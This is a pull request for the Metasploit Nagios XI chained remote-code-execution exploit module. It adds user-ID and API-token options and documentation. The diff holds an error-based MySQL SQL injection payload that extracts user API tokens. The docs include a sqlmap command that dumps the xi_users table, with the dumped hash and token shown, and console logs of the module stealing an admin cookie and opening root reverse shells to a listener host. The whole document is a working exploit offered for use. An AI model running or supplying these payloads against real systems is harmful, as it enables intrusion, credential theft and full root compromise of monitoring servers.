### PR TITLE
NagiosXI Chained RCE versatility

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
@@ -28,7 +28,21 @@ steps on the screen to configure the app.
 Configuration is actually not required to exploit the app, but you should do it
 anyway.
 
+## Options
+
+  **USERID**
+
+  If you wish to exploit a particular UserID, that can be specified here.  Default is 1, which is most likely the admin account.
+  
+  **APITOKEN**
+  
+  The SQLi included only works for MySQL, which should work in most cases.  However, if you experience a different backend, you can enumerate the user
+  table via sqlmap: ```sqlmap -u "http://<ip>/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
+  Then you can set the UserID and APITOKEN to skip those phases and move on to exploitation.  Default is empty.  See example below for more usage.
+
 ## Usage
+
+### Typical Usage
 
 Just set ```RHOST``` and fire off the module! It's pretty much painless.
 ```set VERBOSE true``` if you want to see details.
@@ -70,4 +84,133 @@ id
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 uname -a
 Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Emulating a different DB
+
+#### First we'll attempt the exploit and see what happens.
+
+```
+msf exploit(nagios_xi_chained_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_chained_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   APITOKEN                   no        If an API Token was already stolen, skip the sqli
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST     192.168.2.218    yes       The target address
+   RPORT     80               yes       The target port
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERID    1                yes       User ID in the database to target
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.117    yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nagios XI <= 5.2.7
+
+
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting API token
+[+] 0 incidents resolved in Nagios IM
+
+[-] Exploit aborted due to failure: unexpected-reply: API token not found! punt!
+[*] Exploit completed, but no session was created.
+```
+
+#### Now lets try using sqlmap to enumerate the user table.
+
+```
+root@k:~# sqlmap -u "http://192.168.2.218/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump
+...snip...
+Database: nagiosxi
+Table: xi_users
+[2 entries]
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| user_id | name                 | email             | enabled | username    | password                         | backend_ticket                                                   |
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| 2       | admin2               | admin2@admin2.com | 1       | admin2      | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g |
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+
+...sip...
+```
+
+#### Re-target
+Now, we can set the UserID and APIToken (backend_ticket)
+
+```msf exploit(nagios_xi_chained_rce) > set userid 2
+userid => 2
+msf exploit(nagios_xi_chained_rce) > set apitoken 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+apitoken => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting admin cookie
+[+] 2-tGRcLXmX-e1b4545976adf651e80a15c92200624d
+[+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6;
+[+] CSRF token: c53d1f591264a3ea771639a7782627f8
+[*] Getting monitored host
+[+] Monitored host: localhost
+[*] Downloading component
+[*] Uploading root shell
+[*] Popping shell!
+[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.218:51032) at 2016-10-10 10:15:08 -0400
+[*] Cleaning up...
+[*] rm -rf ../profile
+[*] unzip -qd .. ../../../../tmp/component-profile.zip
+[*] chown -R nagios:nagios ../profile
+[*] rm -f ../../../../tmp/component-ZEaGkiTW.zip
+
+1138255764
+NXEqynCVIfLzvpjUkqOovFvuLgsUrtpo
+CKorOSWlTQEkRoiwCiBqTgylyLQjuWxU
+oIGZxLofAStLsgsMNaGnQzzMuBYpJUQs
+fkUlWzVvhurgAATtxKhLSBFCxQaZqjtR
+QajRDDToeigHGMFdUbaClxkLfJbxqBKv
+whoami
+root
+```
+
+#### No APIToken
+Or if the backend is MySQL but we want to target a different user, we can simply just set the userid with no APIToken.
+
+```
+msf exploit(nagios_xi_chained_rce) > set apitoken ''
+apitoken => 
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting API token
+[+] API token: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+[*] Getting admin cookie
+[+] 2-zIajIKUA-e1b4545976adf651e80a15c92200624d
+[+] Admin cookie: nagiosxi=kjeqq7f074pgn61q8l27togtr3;
+[+] CSRF token: 05ab9c5c27d99e7c13821a3b43d0f5a6
+[*] Getting monitored host
+[+] Monitored host: localhost
+[*] Downloading component
+[*] Uploading root shell
+[*] Popping shell!
+[*] Command shell session 3 opened (192.168.2.117:4444 -> 192.168.2.218:51054) at 2016-10-10 10:17:12 -0400
+[*] Cleaning up...
+[*] rm -rf ../profile
+[*] unzip -qd .. ../../../../tmp/component-profile.zip
+[*] chown -R nagios:nagios ../profile
+[*] rm -f ../../../../tmp/component-xrnIbKdJ.zip
 ```

--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -152,8 +152,6 @@ class MetasploitModule < Msf::Exploit::Remote
                     Digest::MD5.hexdigest(@api_token)
       }
     )
-    vprint_good("#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
-                    Digest::MD5.hexdigest(@api_token))
     if res && (@admin_cookie = res.get_cookies.split('; ').last)
       vprint_good("Admin cookie: #{@admin_cookie}")
       get_csrf_token(res.body)

--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -44,6 +44,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'LHOST'         => Rex::Socket.source_address
       }
     ))
+    register_options([
+        OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]),
+        OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ])
+      ], self.class)
   end
 
   def check
@@ -69,8 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
     end
 
-    print_status('Getting API token')
-    get_api_token
+    unless datastore['APITOKEN'].empty?
+      @api_token = datastore['APITOKEN']
+    else
+      print_status('Getting API token')
+      get_api_token
+    end
     print_status('Getting admin cookie')
     get_admin_cookie
     print_status('Getting monitored host')
@@ -117,13 +125,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {
         'mode'   => 'resolve',
         'host'   => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
-                    'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
+                    "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \
                     '),FLOOR(RAND(0)*2))x ' \
                     'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
       }
     )
-
     if res && res.body =~ /Duplicate entry '(.*?).'/
+      if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
+        # any other user has a longer token, but we cant strip the last char off.
+        # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+        res.body =~ /Duplicate entry '(.*?)'/
+      end
       @api_token = $1
       vprint_good("API token: #{@api_token}")
     else
@@ -136,11 +148,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'   => 'GET',
       'uri'      => '/nagiosxi/rr.php',
       'vars_get' => {
-        'uid'    => "1-#{Rex::Text.rand_text_alpha(8)}-" +
+        'uid'    => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
                     Digest::MD5.hexdigest(@api_token)
       }
     )
-
+    vprint_good("#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
+                    Digest::MD5.hexdigest(@api_token))
     if res && (@admin_cookie = res.get_cookies.split('; ').last)
       vprint_good("Admin cookie: #{@admin_cookie}")
       get_csrf_token(res.body)


### PR DESCRIPTION
I have seen NagiosXI using PostgreSQL, and having user IDs starting in the teens for whatever reason.  The current exploit uses a SQLi that is MySQL dependent, and has a hard coded userID.
Instead of making a working PostgreSQL SQLi, I thought it would be easier to expand the optional variables, and show how to obtain the values via sqlmap if needed.

In summary, this PR adds optional variables for UserID, and APIToken.  If APIToken is given, it skips obtaining such via the SQLi.  If a UserID is given, it uses that user.

Docs were updated to show how to use the changed UserID, and to use sqlmap to obtain the user table and set the APIToken manually.

@wvu-r7 we talked about this a few weeks back, you did a GREAT job making this exploit so verbose and easy to follow.  Made modifying it during a test painless.
